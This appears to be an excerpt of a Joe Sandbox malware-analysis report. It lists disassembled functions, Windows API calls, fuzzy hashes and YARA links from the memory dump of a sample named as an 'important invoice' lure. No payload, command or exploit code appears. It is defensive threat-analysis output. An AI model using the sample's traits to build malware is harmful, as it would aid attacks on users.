Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Object$DeleteIcon$DestroyInfo
String ID:
API String ID: 2179343762-0
Opcode ID: 5056fb5d3304ce98b453d37e334925c73c38f3b363646733b89db40d2e17b405
Instruction ID: c8232f582688a00199b309931cb43af4fe6ef5d54e7a682d8c3142afd9dfd4f6
Opcode Fuzzy Hash: 5056fb5d3304ce98b453d37e334925c73c38f3b363646733b89db40d2e17b405
Instruction Fuzzy Hash: B9219F7160024AFFEF248FA5CC89BFDBBF4EB05312F104566F615A51A2C7709894DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B9E130, Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 00B9E19A
Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 00B9E1A5
Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 00B9E1B0
Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 00B9E1BB
Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 00B9E1C6

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ContextExternal$BaseBase::~Concurrency::details::
String ID:
API String ID: 1690591649-0
Opcode ID: f863bc55fc6e46c10b68a2cfe83f2ca7fd40901798dc93cf5b0b8c0e1ae994c2
Instruction ID: 0f87b3d4b8f9964ed657a160a12e1b433e06f8767498458c6e960cc1862b26a5
Opcode Fuzzy Hash: f863bc55fc6e46c10b68a2cfe83f2ca7fd40901798dc93cf5b0b8c0e1ae994c2
Instruction Fuzzy Hash: 4221D731609A009FD715EB24CC52BEAB7E8EF16720F4046BDF46693691EF30AA05CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00BE834F, Relevance: 7.6, APIs: 5, Instructions: 63windowCOMMON

Download Yara Rule

APIs

GlobalGetAtomNameA.KERNEL32 ref: 00BE83C4
GlobalAddAtomA.KERNEL32 ref: 00BE83D1
GlobalGetAtomNameA.KERNEL32 ref: 00BE83EB
GlobalAddAtomA.KERNEL32 ref: 00BE83F8
SendMessageA.USER32(00000000,000003E4,00000000,?), ref: 00BE841D

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: AtomGlobal$Name$MessageSend
String ID:
API String ID: 1515195355-0
Opcode ID: deb22111c22d3b0862a08f5f10becaa53f07ce8c130b924918ca0ef1bb60f749
Instruction ID: c184555f67b79e4cbd2e69659764ab0dad5bf830b752461f6d93798df4aaaf6e
Opcode Fuzzy Hash: deb22111c22d3b0862a08f5f10becaa53f07ce8c130b924918ca0ef1bb60f749
Instruction Fuzzy Hash: FB218E31A04619EBDB649F65D804BFAB7F8EB08705F00455AF889D72A1DBB4DD84CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC8450, Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

GetMapMode.GDI32(?), ref: 00BC845F
GetDeviceCaps.GDI32(?,00000058), ref: 00BC84A7
GetDeviceCaps.GDI32(?,0000005A), ref: 00BC84B4

Part of subcall function 00BB3B56: MulDiv.KERNEL32(?,00000000,00000000), ref: 00BB3B8F
Part of subcall function 00BB3B56: MulDiv.KERNEL32(?,00000000,00000000), ref: 00BB3BB0

MulDiv.KERNEL32(?,000009EC,00000060), ref: 00BC84D6
MulDiv.KERNEL32(?,000009EC,00000060), ref: 00BC84E3

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: 09e500ebf0af619264d998b688d194be2c1c3c42e577f3712e7dd5647ddeb10a
Instruction ID: 501922b71cebb6a3e89d7a3c25fe062c5bb7afba863136f7d8143786bfed04b8
Opcode Fuzzy Hash: 09e500ebf0af619264d998b688d194be2c1c3c42e577f3712e7dd5647ddeb10a
Instruction Fuzzy Hash: C311CE3A200711EFDB155B22DC88D6EBFAAFF883617140559F946A7360CF31AC41DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC89A4, Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

GetMapMode.GDI32(?), ref: 00BC89B3
GetDeviceCaps.GDI32(?,00000058), ref: 00BC89FB
GetDeviceCaps.GDI32(?,0000005A), ref: 00BC8A08

Part of subcall function 00BB3F6F: MulDiv.KERNEL32(?,00000000,00000000), ref: 00BB3FA8
Part of subcall function 00BB3F6F: MulDiv.KERNEL32(?,00000000,00000000), ref: 00BB3FC9

MulDiv.KERNEL32(?,00000060,000009EC), ref: 00BC8A2A
MulDiv.KERNEL32(?,00000060,000009EC), ref: 00BC8A37

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: ba65210fb28787891d0dee26c815ad019341e392a0ca2a4d7fcdc6ff1c8fd291
Instruction ID: 8ee32feec4d3e4eca595fb522288765192f7e5e6ec662b10711eb6941f544fb6
Opcode Fuzzy Hash: ba65210fb28787891d0dee26c815ad019341e392a0ca2a4d7fcdc6ff1c8fd291
Instruction Fuzzy Hash: 3F11BF39200300EFDB115B56DC8896EBFAAFF887617140559F906A3360DF31AC51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BFAC48, Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BFAC4F
IsWindow.USER32(?), ref: 00BFAC76
InflateRect.USER32(?,00000000,000000FF), ref: 00BFAC92
InvalidateRect.USER32(?,?,00000001), ref: 00BFACA7
UpdateWindow.USER32(?), ref: 00BFACB6

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: RectWindow$H_prolog3_InflateInvalidateUpdate
String ID:
API String ID: 2146894351-0
Opcode ID: 610ea2e39d2c54594afe1d0c7730cdffd8016c32f85e3dbe07f0288711ade004
Instruction ID: 1783a721970ef602167fb338c799c54f7928009242a832137a6721d0b44077fc
Opcode Fuzzy Hash: 610ea2e39d2c54594afe1d0c7730cdffd8016c32f85e3dbe07f0288711ade004
Instruction Fuzzy Hash: FB11F675600219DFDF04EFA4CD94FE977A5FF49300F0402A8EA09AF2A1CB75A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BE6D87, Relevance: 7.6, APIs: 5, Instructions: 54windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32 ref: 00BE6DAC
PostMessageA.USER32(?,00000367,00000000,00000000), ref: 00BE6DBC
GetCapture.USER32 ref: 00BE6DC2
ReleaseCapture.USER32 ref: 00BE6DCE
PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 00BE6DF5

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Message$CapturePost$PeekRelease
String ID:
API String ID: 1125932295-0
Opcode ID: 29c0218e03f0a1a75b546362f8d5271d4e2b5ebdcb3055e6c8222d484735fc4d
Instruction ID: 5d4f9bbca67f6f4da048cbd0ce7283729c7f2f4e439bb094c43802385ede0e7f
Opcode Fuzzy Hash: 29c0218e03f0a1a75b546362f8d5271d4e2b5ebdcb3055e6c8222d484735fc4d
Instruction Fuzzy Hash: 26016530600640EFEA216B36CC49EA77BECFF84784F4445B9F546D6262EB609C01CA30

Uniqueness

Uniqueness Score: -1.00%

Function 00BFF0FD, Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,0000003C,?), ref: 00BFF126
CreateFontIndirectA.GDI32(?), ref: 00BFF13D
IsWindow.USER32(?), ref: 00BFF157
InvalidateRect.USER32(?,00000000,00000001), ref: 00BFF175
UpdateWindow.USER32(?), ref: 00BFF17E

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Window$CreateFontIndirectInvalidateObjectRectUpdate
String ID:
API String ID: 1602852816-0
Opcode ID: eb83d14b70f2d4ab6c688228418c89d4d8343820ccf1e9ef339ff684cb8c8e24
Instruction ID: ceae9538074b57fcc1870ef29705b13c6f48d41d91f9aa4c80facb2c64cf6d3b
Opcode Fuzzy Hash: eb83d14b70f2d4ab6c688228418c89d4d8343820ccf1e9ef339ff684cb8c8e24
Instruction Fuzzy Hash: 5B117031600209EBCB15AB64CD49ABD77F9FF48700F044165E906E7290DF74AE198B91

Uniqueness

Uniqueness Score: -1.00%

Function 00BEC0D8, Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 00BEC109
GetCursorPos.USER32(?), ref: 00BEC119
ScreenToClient.USER32 ref: 00BEC126
PtInRect.USER32(?,?,?), ref: 00BEC136
SetCursor.USER32(?), ref: 00BEC146

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ClientCursorRect$Screen
String ID:
API String ID: 1023402310-0
Opcode ID: fbd5b6dae58d31ec85af5738559047fa46c15d145635a1d82f8e99cdd9c4fefd
Instruction ID: ac1f738dad6e52637004463695573c259da68c7169a6114f6cac0004132566ea
Opcode Fuzzy Hash: fbd5b6dae58d31ec85af5738559047fa46c15d145635a1d82f8e99cdd9c4fefd
Instruction Fuzzy Hash: B211D675D0020AEFDF119FA5D8498BEBBF9FF44300B10456AE416E2220DB349A069FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2689, Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

TlsFree.KERNEL32(?,4B5C1563,?,?,?,00DA74E0,000000FF), ref: 00BC26D0
GlobalHandle.KERNEL32(00000000), ref: 00BC26DF
GlobalUnlock.KERNEL32(00000000,?,?,?,00DA74E0,000000FF), ref: 00BC26E8
GlobalFree.KERNEL32 ref: 00BC26EF
DeleteCriticalSection.KERNEL32(?,4B5C1563,?,?,?,00DA74E0,000000FF), ref: 00BC26F9

Part of subcall function 00BC2977: EnterCriticalSection.KERNEL32(00E47F04,00E47EE8,?,00E47F04), ref: 00BC29F4
Part of subcall function 00BC2977: LeaveCriticalSection.KERNEL32(00E47F04,?), ref: 00BC2A07
Part of subcall function 00BC2977: LocalFree.KERNEL32(00000000), ref: 00BC2A10
Part of subcall function 00BC2977: TlsSetValue.KERNEL32(?,00000000), ref: 00BC2A2F

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
String ID:
API String ID: 1549993015-0
Opcode ID: bb4253220fa549016053c8a33ecc34d363700e156ffac7c1e3c0d02fb062a472
Instruction ID: 6927a4ace7513c2da98464dbfc589a31de706c41982dce19bd44978d45fae064
Opcode Fuzzy Hash: bb4253220fa549016053c8a33ecc34d363700e156ffac7c1e3c0d02fb062a472
Instruction Fuzzy Hash: 63018C31600615EFCB219F65DC08F9ABBE8FB48B61F000369E812D37A0DB74A840CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BEEADE, Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

PtInRect.USER32(?,?,?), ref: 00BEEAFC
RedrawWindow.USER32(?,00000000,00000000,00000401), ref: 00BEEB1A
PtInRect.USER32(?,?,?), ref: 00BEEB37
ReleaseCapture.USER32 ref: 00BEEB47
RedrawWindow.USER32(?,00000000,00000000,00000401), ref: 00BEEB57

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: RectRedrawWindow$CaptureRelease
String ID:
API String ID: 1080614547-0
Opcode ID: 339e5bcf400cd4a6d5ff0f0d308a74c90968c5a15b25bfad8f9062066146ef0a
Instruction ID: c5456dc4c055a2d4c18651e3ee1dea5102efe25160ee868c90039d19e88509ee
Opcode Fuzzy Hash: 339e5bcf400cd4a6d5ff0f0d308a74c90968c5a15b25bfad8f9062066146ef0a
Instruction Fuzzy Hash: B7010C31500745EBDB215F729C48E9B7BFAFB85701F00851AF6AAC2220DB75A411EB20

Uniqueness

Uniqueness Score: -1.00%

Function 00BD7081, Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON

Download Yara Rule

APIs

ScreenToClient.USER32 ref: 00BD708E
SendMessageA.USER32(?,00000366,00000000,00BD6E10), ref: 00BD70AA
ClientToScreen.USER32(?,00000000), ref: 00BD70B7
GetWindowLongA.USER32 ref: 00BD70C0
GetParent.USER32(?), ref: 00BD70CE

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ClientScreen$LongMessageParentSendWindow
String ID:
API String ID: 4240056119-0
Opcode ID: 2a2933b0e1ef7f0091062e5ec7b8e231b110ef2b9d8f9ca082503826c2a4c97a
Instruction ID: 425d93a9c36bdc6f74aba6338e53e409505c3c26c11234b6624e62cfd18aa48d
Opcode Fuzzy Hash: 2a2933b0e1ef7f0091062e5ec7b8e231b110ef2b9d8f9ca082503826c2a4c97a
Instruction Fuzzy Hash: B5F06D3A545A24E7E7211B199C04AFA7BACDB81761F148316FD25C73C0FB34990086B5

Uniqueness

Uniqueness Score: -1.00%

Function 00BB43F7, Relevance: 7.5, APIs: 5, Instructions: 42COMMON

Download Yara Rule

APIs

SelectClipPath.GDI32(?,?), ref: 00BB4403
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00BB4420
GetClipRgn.GDI32(?,00000000), ref: 00BB442C
SelectClipRgn.GDI32(?,00000000), ref: 00BB443A
DeleteObject.GDI32(00000000), ref: 00BB4447

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Clip$Select$CreateDeleteObjectPathRect
String ID:
API String ID: 1230964757-0
Opcode ID: b6943b33433d62171e14dff6ce993ee81ceed555f15bce1b3916b1f8c8767aba
Instruction ID: b6f614ea15077dbcdea50899c7dc43ba6d03458627d2ea6b52608fa3c7fcad66
Opcode Fuzzy Hash: b6943b33433d62171e14dff6ce993ee81ceed555f15bce1b3916b1f8c8767aba
Instruction Fuzzy Hash: 57F0F971200310EFA7205F66ED99DB7BBADFB41B653008939F956C2621DB61EC109A70

Uniqueness

Uniqueness Score: -1.00%

Function 00D9AB15, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 306COMMON

Download Yara Rule

Strings

@Mxt, xrefs: 00D9AE3A
89, xrefs: 00D9AD7B

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID:
String ID: 89$@Mxt
API String ID: 0-1463573933
Opcode ID: c78facd55f815c04e08e861aaedc94a2601d623c05ec279dd7529b37180fc566
Instruction ID: 3054242c02346a55de6acff9ab2aa69d81f2d89e0ede386ea2a2011123c8b9ce
Opcode Fuzzy Hash: c78facd55f815c04e08e861aaedc94a2601d623c05ec279dd7529b37180fc566
Instruction Fuzzy Hash: 8EA10377E002158FDF25AB6CD8856ADB7B1AB55318F2D012AE444AB2A1D7318D84CBF3

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4074, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00BC40B0
StringFromGUID2.OLE32(?,?,00000027,?,?,00000000,00000000,?), ref: 00BC4173
WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,00000027,00000000,00000000,?,?,00000000,00000000,?), ref: 00BC4191

Strings

Interface\, xrefs: 00BC4093

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ByteCharFromMultiStringWide_strlen
String ID: Interface\
API String ID: 3930975075-131377927
Opcode ID: b2df9a3a0b66b2baa2dcc82c10c2362d9e20d10c2ecb545da9d85c6c9f61b845
Instruction ID: 2cb790a6e0eefd9df909d2c9ecefb73b156ea17f58ae036e8fa93f98102d54c2
Opcode Fuzzy Hash: b2df9a3a0b66b2baa2dcc82c10c2362d9e20d10c2ecb545da9d85c6c9f61b845
Instruction Fuzzy Hash: 5A41F771A00129DFDB14DB64DC55FAEBBB8EB08714F0081DAE90AF7250DA30AE85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00BA4F61, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BA4F68
CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00BA4F84
CreateDCA.GDI32(00000000,00000000,?,?), ref: 00BA503E

Strings

DISPLAY, xrefs: 00BA4F7F

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Create$H_prolog3_
String ID: DISPLAY
API String ID: 1883541720-865373369
Opcode ID: 02ef15e2668bcb895aba088d5ada10c848635cafd69265b9398189242e7d7675
Instruction ID: 58f8db35d80fa3cd0716e783b9c5a6793eb53c2cb1992be2570a6a29ab069828
Opcode Fuzzy Hash: 02ef15e2668bcb895aba088d5ada10c848635cafd69265b9398189242e7d7675
Instruction Fuzzy Hash: 4231AD35904626DFCF20DBA4C895AFEBBF4EF4A714F144099F905A7252EB759A00CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00BFE91B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BFE922
SetRectEmpty.USER32 ref: 00BFE959
SendMessageA.USER32(00000000,00001036,00000000,00000020), ref: 00BFE9C8

Strings

SysListView32, xrefs: 00BFE9A4

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
